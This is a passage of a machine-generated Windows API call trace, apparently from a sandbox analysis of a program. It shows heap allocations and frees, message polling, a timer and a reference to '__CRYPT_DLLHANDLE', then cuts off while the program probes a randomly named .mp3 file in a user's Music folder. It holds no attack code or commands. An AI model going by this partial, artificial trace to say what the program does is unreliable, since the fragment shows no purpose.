uIDEvent=0x1) returned 1 [0117.689] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0117.689] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0117.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0117.689] PeekMessageW (in: lpMsg=0x144e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9fc) returned 0 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0117.689] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0117.689] FreeLibrary (hLibModule=0x756e0000) returned 1 [0117.689] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0117.690] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0117.690] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0117.690] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca730 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.690] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.690] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.690] CloseHandle (hObject=0x298) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eaa90 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0117.691] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0117.691] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4f0 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0117.691] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0117.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0117.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0117.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0117.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0117.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0117.692] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0117.692] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0117.692] CloseHandle (hObject=0x258) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0117.695] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0117.695] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0117.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0117.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0117.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0117.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0117.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0117.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0117.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0117.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0117.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0117.703] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23f0 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0117.703] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3", lpFilePart=0x0) returned 0x39 [0117.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0117.703] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0117.703] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\spIObPh75b\\caX1anHBaP9sA34Tftcq.mp3" (normalized: "c:\\users\\fd1hvy\\music\\spiobph75b\\cax1anhbap9sa34tftcq.mp3")) returned 0x20 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0117.704] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ea8 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0117.704] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0117.704] FindFirstFileW (in: 